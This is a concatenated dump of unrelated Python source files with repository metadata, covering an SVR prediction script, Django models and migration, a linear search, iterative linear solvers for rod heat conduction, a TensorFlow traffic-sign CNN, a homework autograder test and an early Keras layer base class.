ans = svr.predict(minMaxFeatures.transform(test))
test = [row[0] for row in test]
ansO = minMaxPred.inverse_transform(ans)
errors = dict(
    mse=mean_squared_error(test, ansO),
    mean_ae=mean_absolute_error(test, ansO),
    median_ae=median_absolute_error(test, ansO)
)
print(errors)
# with open('./../../upinkai/company_clf/'+symbol, 'wb') as file:
#     pickle.dump(dict(svr=svr, minMaxPred=minMaxPred, minMaxFeatures=minMaxFeatures, startDate=startDate, errors=errors), file)
plt.plot(range(testSplit), test, 'blue', range(testSplit), ansO, 'red')
plt.show()
| [
"adarshdec23@gmail.com"
] | adarshdec23@gmail.com |
6ef3c83d36f6ec0220aac1a51684ae0b2282e8bf | bc3d701be4c74be92334b3d7274e7a768ef2301a | /example/models.py | b8947e702743d1797ee08a5c53da8eb8124cf228 | [
"BSD-2-Clause"
] | permissive | secretescapes/django-image-cropping | 4c28aa03a96b89a6f96a2bf844c8dd34810682e0 | b020cdbeb079e2aced37c95fcfc4f92310c32b6f | refs/heads/master | 2021-01-16T20:22:55.790304 | 2013-12-17T10:04:42 | 2013-12-17T10:04:42 | 8,149,406 | 0 | 0 | NOASSERTION | 2020-09-30T10:11:13 | 2013-02-11T23:38:14 | JavaScript | UTF-8 | Python | false | false | 460 | py | from django.db import models
from image_cropping.fields import ImageRatioField, ImageCropField
class Image(models.Model):
    # The uploaded source image that crops are applied to.
    image_field = ImageCropField(upload_to='image/')
    # Stores the selected crop geometry ('120x100') for `image_field`.
    cropping = ImageRatioField('image_field', '120x100')
    class Meta:
        app_label = 'example'
class ImageFK(models.Model):
    # Related Image whose file this model crops.
    image = models.ForeignKey(Image)
    # Crop geometry for the *related* model's field, referenced via the
    # 'image__image_field' traversal syntax.
    cropping = ImageRatioField('image__image_field', '120x100')
    class Meta:
        app_label = 'example'
| [
"jvp@jonasundderwolf.de"
] | jvp@jonasundderwolf.de |
273b5505057d982021495dce3b256d262170721f | dfef605454cbeef93f732dde78dab0b354a21ab8 | /SortAndNavigation/search.py | d064a62e9b3572ecb43cd364eb1454f1780b5bc4 | [] | no_license | moonsung1234/algorithm_example | df85383c9a2791d6850da8da00ba9af977b3f111 | f3a2ef786f997f75a2209d7207aa8b5915820e23 | refs/heads/master | 2023-05-15T19:29:41.354458 | 2021-06-02T15:56:27 | 2021-06-02T15:56:27 | 365,147,561 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py |
def searchList(a, x):
    """Linear search: return the index of the first occurrence of `x` in the
    sequence `a`, or -1 if `x` is not present (handles empty sequences)."""
    for i, item in enumerate(a):
        if item == x:
            return i
    return -1
a = [1, 2, 3, 4, 5]
print(searchList(a, 1)) | [
"dit67890@gmail.com"
] | dit67890@gmail.com |
930fd3e4f431108378760e9867c272e65832e126 | 18e10adefe816a563fb71d3fdeefb4ac8944a409 | /10_days_of_statistics/basic_probability.py | e163287a4bfc4f23c56fa8e6b57fac5c21f5e0e1 | [] | no_license | hejo89/hackerrank | 51ddd0a51bbb70501293df26a8097f09d457a334 | cdb7c0bf1c8d25ba29fd83a4eae81a023704c402 | refs/heads/master | 2020-09-29T16:48:29.107278 | 2019-12-10T09:44:13 | 2019-12-10T09:44:13 | 227,076,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | print len([i + k for i in range(1, 7) for k in range(1, 7) if i + k < 10]) / 36.0
| [
"johannes.hess.89@googlemail.com"
] | johannes.hess.89@googlemail.com |
c67cdd7563297c766de333e08bf9da4623eb1a76 | f9867ff04d805cf81c5b30332b1a9b7b131b745c | /hwk/hw4/tests/q25.py | 1592c757b23900549f40a4fa7cfc7bcf34f839fe | [] | no_license | MiaZhong/demog180-su2019 | e1db89e2e0147724176e77c0a223ccf4fc9dcff5 | 73ac474cbc18f2c1ac39fecc502fc6605b1fdbcc | refs/heads/master | 2020-06-15T13:37:04.436833 | 2019-08-09T06:40:50 | 2019-08-09T06:40:50 | 195,314,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | test = {
'name': 'q25',
'points': 5,
'suites': [
{
'cases': [
{
'code': r"""
>>> sim_results.num_rows
800
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> np.round(np.mean(sim_results['num_infected_random']), 0)
71.0
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"miazhongrj@gmail.com"
] | miazhongrj@gmail.com |
f8e4c1c00831915fad031f3764008c58b4f72f93 | 162e176ccf7d34c2d4258a4be66ca62758b87fee | /nonlinear.py | f32e672ebc5e966f942b3c4c7bfdaaaa1682702b | [] | no_license | desidisivaprakash/large-scale-numerical-simulations | 421d2cd18704b1dc155d994d31beff3f399246d1 | ce310847bcbba45619a750ffc75a48ff17b2ce74 | refs/heads/master | 2021-01-23T02:34:42.606763 | 2015-02-19T21:00:01 | 2015-02-19T21:00:01 | 31,033,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,595 | py | '''siva'''
import sys
import copy
import matplotlib.pyplot as plt
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from numpy import matrix
def drange(start, stop, step):
    """Yield floats from `start` (inclusive) up to `stop` (exclusive) in
    increments of `step` -- a float-friendly analogue of range()."""
    current = start
    while current < stop:
        yield current
        current += step
def initial_guess(a):
    """Return the starting vector for the iterative solvers: one entry of
    300 (the initial temperature guess) per row of the system matrix `a`.

    Replaces the old py2-only ``[300 for x in xrange(len(a))]`` and drops
    the dead commented-out random-shuffle experiment.
    """
    return [300] * len(a)
def condition_check(x, y):
    """Return True while the solver should keep iterating.

    True means some pair of corresponding entries of `x` and `y` still
    differs by more than the convergence tolerance; False means every
    entry has converged.
    """
    ##Change value of tolerence in here:
    epsilon = 0.0001
    # Idiomatic (and py3-compatible) replacement for the original
    # index-based loop with early return.
    return any(abs(a - b) > epsilon for a, b in zip(x, y))
def jacobi(a, b):
    """Solve the linear system a*x = b with the Jacobi iteration.

    Each new component is computed from the *previous* iterate only.
    Starts from `initial_guess(a)`, iterates until `condition_check`
    reports convergence, prints the iteration count and returns the
    solution vector.  (Syntax modernised: works on Python 2 and 3 with
    identical output.)
    """
    X = initial_guess(a)
    condition = True
    count = 0
    while condition:
        new_X = [0] * len(X)
        for i in range(len(X)):
            # Sum of the off-diagonal terms using the previous iterate.
            acc = 0
            for j in range(len(X)):
                if j != i:
                    acc += a[i][j] * X[j]
            new_X[i] = (1.0 / a[i][i]) * (b[i] - acc)
        condition = condition_check(new_X, X)
        count += 1
        X = new_X
    print("Total iterations for solving equations by Jacobi method: %d" % count)
    return X
def gauss_seidel(a, b):
    """Solve a*x = b with the Gauss-Seidel iteration.

    Unlike Jacobi, each component update immediately uses the freshest
    values of the other components.  Prints the total iteration count and
    returns the solution vector.

    Cleanup: removed the per-iteration debug ``print count2`` (it flooded
    stdout every sweep), removed the dead commented-out plotting block,
    and modernised the py2-only syntax (``xrange``, print statement) while
    keeping the final output line identical.
    """
    X = initial_guess(a)
    condition = True
    count2 = 0
    while condition:
        prev_X = copy.deepcopy(X)  # snapshot for the convergence test
        for i in range(len(X)):
            acc = 0
            for j in range(len(X)):
                if j != i:
                    acc += a[i][j] * X[j]  # X[j] may already be updated
            X[i] = (1.0 / a[i][i]) * (b[i] - acc)
        condition = condition_check(prev_X, X)
        count2 += 1
    print("Total iterations for solving equations by Gauss-Seidel method: %d" % count2)
    return X
def sor(a, b):
    """Sweep the SOR relaxation weight over [1.1, 1.99) in 0.01 steps,
    solving a*x = b once per weight, then plot iterations-vs-weight and
    report the weight that converged fastest.

    Returns the constant 2 (historical sentinel kept for callers); the
    per-weight solution vectors are discarded.
    """
    weights = []
    iterations = []
    for weight in drange(1.1, 1.99, 0.01):
        X = initial_guess(a)
        condition = True
        count3 = 0
        weights.append(weight)
        while condition:
            prev_X = copy.deepcopy(X)
            for i in range(len(X)):
                acc = 0
                for j in range(len(X)):
                    if j != i:
                        acc += a[i][j] * X[j]
                # Weighted blend of the Gauss-Seidel update and the old value.
                X[i] = weight * (1.0 / a[i][i]) * (b[i] - acc) + (1 - weight) * X[i]
            condition = condition_check(prev_X, X)
            count3 += 1
        iterations.append(count3)
    # BUG FIX: the original scan started at index 1, ignored index 0, and
    # never assigned `index` when the first examined entry was already the
    # minimum (NameError / stale index).  This finds the true argmin.
    index = iterations.index(min(iterations))
    print("Total iterations for solving equations by SOR method for optimum weight %s : %d"
          % (weights[index], iterations[index]))
    plt.plot(weights, iterations)
    plt.xlabel('Weight assigned to Gauss Seidel method')
    plt.ylabel('Iterations for reaching optimum solution')
    plt.title('Iterations v/s Weight analysis for SOR method')
    plt.grid(True)
    plt.savefig("output_SOR.png")
    plt.show()
    return 2
def conduction(a, b, beta):
    """Solve the nonlinear (radiative T**4 term) conduction problem by
    repeated SOR sweeps, re-linearising the right-hand side each outer
    iteration.

    WARNING: mutates the caller's `b` in place, and reads the globals
    T0, T10, sigma and delta_x that main() sets.  Returns `master_X`,
    the list of every iterate (including the converged one).
    """
    X = initial_guess(a)
    condition = True
    #count3 = 0
    weight = 1.92  # fixed SOR relaxation weight (near the optimum found by sor())
    iteration = 1
    master_X = []
    while condition == True:
        print iteration
        iteration += 1
        prev_X = copy.deepcopy(X)
        # Improving B
        # Rebuild the RHS from the previous iterate: boundary rows carry the
        # fixed end temperatures, interior rows add the radiation term.
        b[0] = beta - T0
        b[-1] = beta - T10
        for i in xrange(1, len(b) - 1):
            b[i] = beta + sigma*(delta_x**2)*(prev_X[i]**4)
        # One SOR sweep with the frozen RHS.
        for i in xrange(len(X)):
            sum = 0
            for j in xrange(len(X)):
                if j != i:
                    sum += (a[i][j])*(X[j])
            X[i] = (weight)*(1.0/a[i][i])*(b[i] - sum) + (1 - weight)*(X[i])
        condition = condition_check(prev_X, X)
        master_X.append(prev_X)
        if condition == False:
            master_X.append(X)  # also keep the final converged iterate
    return master_X
def main():
    """Set up the 1-D rod conduction problem (tridiagonal system), solve the
    linear case with SOR, then the nonlinear radiative case with
    conduction(), and plot all iterates in 3-D.  Returns 2."""
    ## A matrix in Ax = B
    ### Problem ->
    # These globals are read by conduction() and by the RHS rebuild there.
    global Nx, delta_x, sigma, T0, T10
    Nx = 200
    delta_x = float(10)/Nx
    t_air = 200
    h = 0.05
    sigma = 2.7e-8
    #T = [0 for x in xrange(int(Nx))]
    T0 = 300
    T10 = 400
    A = [[0 for x in xrange(int(Nx))] for x in xrange(int(Nx))]
    alpha = 2 + (0.05)*(delta_x**2)
    list1 = [1, -alpha, 1]
    # Boundary rows of the tridiagonal matrix.
    A[0][0] = -alpha
    A[0][1] = 1
    A[int(Nx)-1][int(Nx)-2] = 1
    A[int(Nx)-1][int(Nx)-1] = -alpha
    # Fill interior rows: pop() writes [1, -alpha, 1] right-to-left starting
    # at column x-1, i.e. the (sub, diag, super) stencil for row x.
    for x in xrange(1, int(Nx)-1):
        list2 = copy.deepcopy(list1)
        for y in xrange(x-1, int(Nx)):
            if list2:
                A[x][y] = list2.pop()
    #print A
    B = [0 for x in xrange(Nx)]
    B[0] = -h*t_air*(delta_x**2) - T0
    B[-1] = -h*t_air*(delta_x**2) - T10
    for i in xrange(1, len(B)-1):
        B[i] = -h*t_air*(delta_x**2)
    #print B
    # Constant part of the nonlinear RHS used by conduction().
    beta = -h*t_air*(delta_x**2) - sigma*(t_air**4)*(delta_x**2)
    ## B matrix in Ax = B
    print "\n"
    #print "Solution:", jacobi(A, B), "\n\n"
    #y = gauss_seidel(A, B)
    #y=jacobi(A,B)
    y=sor(A,B)
    # NOTE(review): sor() returns the constant 2, not a solution vector, so
    # the "Solution" print and the 'Linear Solution' plot below show that
    # constant -- use gauss_seidel()/jacobi() if the vector is wanted.
    print "Solution:", y, "\n\n"
    #useless_var = sor(A, B)
    XX = conduction(A, B, beta)
    #print x
    points = []
    for as_point in xrange(Nx):
        points.append(as_point*delta_x)
    print "Length of list", len(XX)
    fig = plt.figure()
    ax = fig.gca(projection='3d')
    # One curve per nonlinear iterate, stacked along the z (iteration) axis.
    xx_index = 1
    for list1 in XX:
        ax.plot(points, list1, xx_index)
        xx_index += 1
    ax.plot(points, y, xx_index, label='Linear Solution')
    ax.set_xlabel('Length')
    ax.set_ylabel('Temperature')
    ax.set_zlabel('Iterations')
    ax.set_title('Temperature variation along the length of the rod')
    #plt.savefig("output_final3.png")
    ax.legend()
    plt.show()
    return 2
if __name__ == "__main__":
    # main() returns 2, which therefore becomes the process exit status.
    sys.exit(main())
| [
"desidisivaprakash@gmail.com"
] | desidisivaprakash@gmail.com |
03960f0f3fa5ef588fe7de7fb3dff054e493b677 | 90e1f9d99ab05ce34380f7b63ec3c6a2f02f3d62 | /src/team503/src/traffic_sign_detect/CNN_3channels_4conv.py | 18f641b42ae797f3a77c79becae44d8dd3b29087 | [] | no_license | sihcpro/The-Number1c-Rac1ng | eb038099c8deb6fbb6e88cde60c7a7f25474e5da | 856434acec52f52a8784199180692abbdb4a49e8 | refs/heads/master | 2020-04-12T10:07:24.182205 | 2019-01-15T22:21:43 | 2019-01-15T22:21:43 | 162,419,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,463 | py | import pickle
import cv2
from sklearn.utils import shuffle
import tensorflow as tf
# Dataset / checkpoint locations (relative to the project root).
TRAIN_DATA_DIR = "data/raw/training/augmented/"
TEST_DATA_DIR = "data/raw/testing"
# TEST_DATA_DIR = "data/raw/testing/00014"
CNN_MODEL_DIR = "model/CNN/3cnn_4conv.ckpt"
PICKLE_IMGS_DIR = "data/pickle/train_imgs_56.pkl"
PICKLE_LABELS_DIR = "data/pickle/test_labels.pkl"
# Nine traffic-sign classes; inputs are 56x56 RGB images.
NUM_CLASSES = 9
IMG_SIZE = 56
def deepnn(x):
    """Build the 4-conv/3-pool classification graph for 56x56 RGB inputs.

    Args:
        x: input tensor of shape [-1, IMG_SIZE, IMG_SIZE, 3].
    Returns:
        (y_conv, keep_prob): the [-1, NUM_CLASSES] logits tensor and the
        dropout keep-probability placeholder to feed at run time.
    """
    with tf.name_scope('reshape'):
        x_image = x
        # x_image = tf.placeholder([-1, 28, 28, 3])
    # First convolutional layer - maps the 3-channel image to 32 feature maps.
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 3, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
    # Pooling layer - downsamples by 2X.
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
    # Second convolutional layer -- maps 32 feature maps to 64.
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2 = bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
    # Second pooling layer.
    with tf.name_scope('pool2'):
        h_pool2 = max_pool_2x2(h_conv2)
    # Third convolutional layer -- maps 64 feature maps to 64.
    with tf.name_scope('conv3'):
        W_conv3 = weight_variable([5, 5, 64, 64])
        b_conv3 = bias_variable([64])
        h_conv3 = tf.nn.relu(conv2d(h_pool2, W_conv3) + b_conv3)
    # Forth convolutional layer -- maps 64 feature maps to 64 (no pooling
    # between conv3 and conv4).
    with tf.name_scope('conv4'):
        W_conv4 = weight_variable([5, 5, 64, 64])
        b_conv4 = bias_variable([64])
        h_conv4 = tf.nn.relu(conv2d(h_conv3, W_conv4) + b_conv4)
    # Third pooling layer.
    with tf.name_scope('pool3'):
        h_pool3 = max_pool_2x2(h_conv4)
    # Fully connected layer 1 -- after 3 rounds of 2x downsampling the
    # 56x56 image is down to 7x7x64 feature maps -- maps this to 1024 features.
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        h_pool3_flat = tf.reshape(h_pool3, [-1, 7 * 7 * 64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool3_flat, W_fc1) + b_fc1)
    # Dropout - controls the complexity of the model, prevents co-adaptation of
    # features.
    with tf.name_scope('dropout'):
        keep_prob = tf.placeholder(tf.float32)
        h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
    # Map the 1024 features to NUM_CLASSES classes, one per traffic-sign class
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, NUM_CLASSES])
        b_fc2 = bias_variable([NUM_CLASSES])
        y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    return y_conv, keep_prob
def conv2d(x, W):
    """Return a 2-D convolution of `x` with kernel `W` using stride 1 and
    'SAME' padding (spatial size is preserved)."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """Downsample `x` by 2x in both spatial dimensions with 2x2 max pooling
    ('SAME' padding, stride 2)."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                          strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
    """Create a trainable weight tensor of `shape`, initialised from a
    truncated normal distribution with stddev 0.1."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
    """Create a trainable bias tensor of `shape`, initialised to 0.1."""
    return tf.Variable(tf.constant(0.1, shape=shape))
| [
"tvquocchi@gmail.com"
] | tvquocchi@gmail.com |
22e4593e3b8168d3afcc0f6a85b63881afc24dc1 | f0f42828e8458246e2c492849ad6623b89a590cc | /home/migrations/0001_initial.py | 65c98fe2ad6de87a30d97d25215e50bff1b92faf | [] | no_license | prashantmore20/mmyk-blog | c8f775c472914566a648bef757b5adeae2661cf1 | fc76ca79bcb29a3534b6f1b286c072a33500233a | refs/heads/main | 2023-03-01T05:51:27.164011 | 2021-02-13T16:07:39 | 2021-02-13T16:07:39 | 326,447,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | # Generated by Django 3.0 on 2020-12-27 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
    # First migration of the `home` app: nothing to depend on yet.
    initial = True
    dependencies = [
    ]
    operations = [
        # Create the Contact table with an explicit auto-increment PK.
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('sno', models.AutoField(primary_key=True, serialize=False)),
                ('fname', models.CharField(max_length=300)),
                ('lname', models.CharField(max_length=300)),
            ],
        ),
    ]
| [
"prashant.more20@gmail.com"
] | prashant.more20@gmail.com |
8d7a88b96271237b2da557618c38b7480a979454 | 4e2fdafb5231e65d90d1400dd29580477a1a8fad | /typhoon_scipts/lstm_1.0/recurrent_convolutional_core.py | 8b1b1e723ea94c3409331303a945c1537e2daf6a | [] | no_license | DanlanChen/typhoon_analysis_nii | 6e5c9c556a0b501485f7221eb6ff2891b398f012 | 1f6ad00db6cdabac25e2ff6c56fa553dea710538 | refs/heads/master | 2021-05-04T06:58:20.485310 | 2017-11-10T17:33:49 | 2017-11-10T17:33:49 | 70,544,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,981 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
import numpy as np
from collections import OrderedDict
import copy
from six.moves import zip
from keras import backend as K
from keras import activations, initializations, regularizers, constraints
from keras.regularizers import ActivityRegularizer
import marshal
import types
import sys
class Layer(object):
    '''Abstract base layer class.
    All Keras layers accept certain keyword arguments:
        trainable: boolean. Set to "False" before model compilation
            to freeze layer weights (they won't be updated further
            during training).
        input_shape: a tuple of integers specifying the expected shape
            of the input samples. Does not includes the batch size.
            (e.g. `(100,)` for 100-dimensional inputs).
        batch_input_shape: a tuple of integers specifying the expected
            shape of a batch of input samples. Includes the batch size
            (e.g. `(32, 100)` for a batch of 32 100-dimensional inputs).
    '''
    def __init__(self, **kwargs):
        # Make sure the weight containers exist even for layers that
        # never define parameters of their own.
        if not hasattr(self, 'trainable_weights'):
            self.trainable_weights = []
        if not hasattr(self, 'non_trainable_weights'):
            self.non_trainable_weights = []
        allowed_kwargs = {'input_shape',
                          'trainable',
                          'batch_input_shape',
                          'cache_enabled',
                          'name'}
        for kwarg in kwargs:
            assert kwarg in allowed_kwargs, 'Keyword argument not understood: ' + kwarg
        # `batch_input_shape` already includes the batch size;
        # `input_shape` does not, so an unknown batch dim (None) is
        # prepended before storing it.
        if 'batch_input_shape' in kwargs:
            self.set_input_shape(tuple(kwargs['batch_input_shape']))
        elif 'input_shape' in kwargs:
            self.set_input_shape((None,) + tuple(kwargs['input_shape']))
        self.trainable = True
        if 'trainable' in kwargs:
            self.trainable = kwargs['trainable']
        # Default name is the lowercased class name.
        self.name = self.__class__.__name__.lower()
        if 'name' in kwargs:
            self.name = kwargs['name']
        self.cache_enabled = True
        if 'cache_enabled' in kwargs:
            self.cache_enabled = kwargs['cache_enabled']
    @property
    def name(self):
        # Layer name (string); settable, defaults to the class name.
        return self._name
    @name.setter
    def name(self, name):
        self._name = name
    @property
    def cache_enabled(self):
        # Whether output/shape caching is used in get_input/input_shape.
        return self._cache_enabled
    @cache_enabled.setter
    def cache_enabled(self, value):
        self._cache_enabled = value
    def __call__(self, X, mask=None, train=False):
        '''Apply this layer to an arbitrary input tensor `X` and return
        the resulting output tensor.
        Works by temporarily wiring a dummy input layer holding `X` (and
        optionally `mask`) in front of this layer, computing the output,
        then restoring the original connection (if any).
        '''
        # turn off layer cache temporarily
        tmp_cache_enabled = self.cache_enabled
        self.cache_enabled = False
        # create a temporary layer
        layer = Layer(batch_input_shape=self.input_shape)
        layer.name = "dummy"
        layer.input = X
        if hasattr(self, 'get_input_mask'):
            layer.get_input_mask = lambda _: mask
        # set temporary previous
        tmp_previous = None
        if hasattr(self, 'previous'):
            tmp_previous = self.previous
        self.set_previous(layer, False)
        Y = self.get_output(train=train)
        # return previous to what it was
        if tmp_previous is not None:
            self.set_previous(tmp_previous, False)
        else:
            self.clear_previous(False)
        self.cache_enabled = tmp_cache_enabled
        return Y
    def set_previous(self, layer, reset_weights=True):
        '''Connect a layer to its parent in the computational graph.
        '''
        assert self.nb_input == layer.nb_output == 1, 'Cannot connect layers: input count and output count should be 1.'
        if hasattr(self, 'input_ndim'):
            assert self.input_ndim == len(layer.output_shape), ('Incompatible shapes: layer expected input with ndim=' +
                                                                str(self.input_ndim) +
                                                                ' but previous layer has output_shape ' +
                                                                str(layer.output_shape))
        if layer.get_output_mask() is not None:
            assert self.supports_masked_input(), 'Cannot connect non-masking layer to layer with masked output.'
        # When weights are kept, the incoming shape must match exactly,
        # since the existing weights were built for the old shape.
        if not reset_weights:
            assert layer.output_shape == self.input_shape, ('Cannot connect layers without resetting weights: ' +
                                                            'expected input with shape ' +
                                                            str(self.input_shape) +
                                                            ' but previous layer has output_shape ' +
                                                            str(layer.output_shape))
        self.previous = layer
        if reset_weights:
            self.build()
    def clear_previous(self, reset_weights=True):
        '''Unlink a layer from its parent in the computational graph.
        This is only allowed if the layer has an `input` attribute.
        '''
        if not hasattr(self, 'input'):
            raise Exception('Cannot clear previous for non-input layers')
        if hasattr(self, 'previous'):
            del self.previous
            if reset_weights:
                self.build()
    def build(self):
        '''Instantiation of layer weights.
        Called after `set_previous`, or after `set_input_shape`,
        once the layer has a defined input shape.
        Must be implemented on all layers that have weights.
        '''
        pass
    @property
    def trainable(self):
        # Trainability flag; defaults to True when never set.
        if hasattr(self, '_trainable'):
            return self._trainable
        else:
            return True
    @trainable.setter
    def trainable(self, value):
        self._trainable = value
    @property
    def nb_input(self):
        # Number of input tensors this layer consumes.
        return 1
    @property
    def nb_output(self):
        # Number of output tensors this layer produces.
        return 1
    @property
    def input_shape(self):
        # if layer is not connected (e.g. input layer),
        # input shape can be set manually via _input_shape attribute.
        if hasattr(self, 'previous'):
            # `shape_cache` (set externally, e.g. by a container) avoids
            # recomputing the previous layer's output shape repeatedly.
            if hasattr(self, 'shape_cache') and self.cache_enabled:
                previous_layer_id = id(self.previous)
                if previous_layer_id in self.shape_cache:
                    return self.shape_cache[previous_layer_id]
            previous_size = self.previous.output_shape
            if hasattr(self, 'shape_cache') and self.cache_enabled:
                previous_layer_id = id(self.previous)
                self.shape_cache[previous_layer_id] = previous_size
            return previous_size
        elif hasattr(self, '_input_shape'):
            return self._input_shape
        else:
            raise Exception('Layer is not connected. Did you forget to set "input_shape"?')
    def set_input_shape(self, input_shape):
        '''Record the (batch-inclusive) input shape, create a matching
        input placeholder, and (re)build the layer weights.
        '''
        if type(input_shape) not in [tuple, list]:
            raise Exception('Invalid input shape - input_shape should be a tuple of int.')
        input_shape = tuple(input_shape)
        if hasattr(self, 'input_ndim') and self.input_ndim:
            if self.input_ndim != len(input_shape):
                raise Exception('Invalid input shape - Layer expects input ndim=' +
                                str(self.input_ndim) +
                                ', was provided with input shape ' + str(input_shape))
        self._input_shape = input_shape
        self.input = K.placeholder(shape=self._input_shape)
        self.build()
    @property
    def output_shape(self):
        # default assumption: tensor shape unchanged.
        return self.input_shape
    def get_output(self, train=False):
        # Identity by default; subclasses override with their computation.
        return self.get_input(train)
    def get_input(self, train=False):
        if hasattr(self, 'previous'):
            # to avoid redundant computations,
            # layer outputs are cached when possible.
            if hasattr(self, 'layer_cache') and self.cache_enabled:
                previous_layer_id = '%s_%s' % (id(self.previous), train)
                if previous_layer_id in self.layer_cache:
                    return self.layer_cache[previous_layer_id]
            previous_output = self.previous.get_output(train=train)
            if hasattr(self, 'layer_cache') and self.cache_enabled:
                previous_layer_id = '%s_%s' % (id(self.previous), train)
                self.layer_cache[previous_layer_id] = previous_output
            return previous_output
        elif hasattr(self, 'input'):
            return self.input
        else:
            raise Exception('Layer is not connected' +
                            ' and is not an input layer.')
    def supports_masked_input(self):
        '''Whether or not this layer respects the output mask of its previous
        layer in its calculations.
        If you try to attach a layer that does *not* support masked_input to
        a layer that gives a non-None output_mask(), an error will be raised.
        '''
        return False
    def get_output_mask(self, train=None):
        '''For some models (such as RNNs) you want a way of being able to mark
        some output data-points as "masked",
        so they are not used in future calculations.
        In such a model, get_output_mask() should return a mask
        of one less dimension than get_output()
        (so if get_output is (nb_samples, nb_timesteps, nb_dimensions),
        then the mask is (nb_samples, nb_timesteps),
        with a one for every unmasked datapoint,
        and a zero for every masked one.
        If there is *no* masking then it shall return None.
        For instance if you attach an Activation layer (they support masking)
        to a layer with an output_mask, then that Activation shall
        also have an output_mask.
        If you attach it to a layer with no such mask,
        then the Activation's get_output_mask shall return None.
        Some layers have an output_mask even if their input is unmasked,
        notably Embedding which can turn the entry "0" into
        a mask.
        '''
        return None
    def set_weights(self, weights):
        '''Set the weights of the layer.
        weights: a list of numpy arrays. The number
            of arrays and their shape must match
            number of the dimensions of the weights
            of the layer (i.e. it should match the
            output of `get_weights`).
        '''
        params = self.trainable_weights + self.non_trainable_weights
        assert len(params) == len(weights), ('Provided weight array does not match layer weights (' +
                                             str(len(params)) + ' layer params vs. ' +
                                             str(len(weights)) + ' provided weights)')
        for p, w in zip(params, weights):
            if K.get_value(p).shape != w.shape:
                raise Exception('Layer weight shape %s not compatible with provided weight shape %s.' % (K.get_value(p).shape, w.shape))
            K.set_value(p, w)
    def get_weights(self):
        '''Return the weights of the layer,
        as a list of numpy arrays.
        '''
        params = self.trainable_weights + self.non_trainable_weights
        weights = []
        for p in params:
            weights.append(K.get_value(p))
        return weights
    def get_config(self):
        '''Return the parameters of the layer, as a dictionary.
        '''
        config = {'name': self.__class__.__name__}
        if hasattr(self, '_input_shape'):
            input_shape = self._input_shape
            # A concrete batch size was given -> serialize the full
            # batch_input_shape; otherwise drop the leading None.
            if input_shape[0]:
                config['batch_input_shape'] = input_shape[:]
            else:
                config['input_shape'] = input_shape[1:]
        if hasattr(self, '_trainable'):
            config['trainable'] = self._trainable
        config['cache_enabled'] = self.cache_enabled
        config['custom_name'] = self.name
        return config
    def get_params(self):
        '''Return the tuple (trainable_weights, regularizers,
        constraints, updates) used by optimizers/containers.
        Constraints are padded with identity so they align 1:1 with
        the trainable weights.
        '''
        consts = []
        updates = []
        if hasattr(self, 'regularizers'):
            regularizers = self.regularizers
        else:
            regularizers = []
        if hasattr(self, 'constraints') and len(self.constraints) == len(self.trainable_weights):
            for c in self.constraints:
                if c:
                    consts.append(c)
                else:
                    consts.append(constraints.identity())
        elif hasattr(self, 'constraint') and self.constraint:
            consts += [self.constraint for _ in range(len(self.trainable_weights))]
        else:
            consts += [constraints.identity() for _ in range(len(self.trainable_weights))]
        if hasattr(self, 'updates') and self.updates:
            updates += self.updates
        return self.trainable_weights, regularizers, consts, updates
    def count_params(self):
        '''Return the total number of floats (or ints)
        composing the weights of the layer.
        '''
        return sum([K.count_params(p) for p in self.trainable_weights])
class MaskedLayer(Layer):
    '''Base class for layers that trivially support masking by passing
    the input mask through to the output unchanged.
    Subclass this instead of `Layer` when your layer can simply forward
    its input mask, and make sure get_output() honours the mask.
    '''
    def supports_masked_input(self):
        # Masked layers always accept a masked input.
        return True
    def get_input_mask(self, train=False):
        # An unconnected layer has no incoming mask; otherwise ask the
        # parent layer for its output mask.
        if not hasattr(self, 'previous'):
            return None
        return self.previous.get_output_mask(train)
    def get_output_mask(self, train=False):
        # Default behavior: the mask flows through untouched. Override
        # in subclasses that reshape or re-time their input.
        return self.get_input_mask(train)
class Masking(MaskedLayer):
    '''Mask timesteps of an input sequence that consist entirely of
    `mask_value`.
    The output equals the input with fully-masked timesteps zeroed out,
    and an output mask is produced: a timestep's mask entry is 0 when
    every feature at that timestep equals `mask_value`, else 1.
    '''
    def __init__(self, mask_value=0., **kwargs):
        super(Masking, self).__init__(**kwargs)
        self.mask_value = mask_value
        if not hasattr(self, 'input'):
            # Stand-alone use: expect 3D (samples, timesteps, features).
            self.input = K.placeholder(ndim=3)
    def get_output_mask(self, train=False):
        inputs = self.get_input(train)
        # Timestep is kept if any feature differs from the mask value.
        differs = K.not_equal(inputs, self.mask_value)
        return K.any(differs, axis=-1)
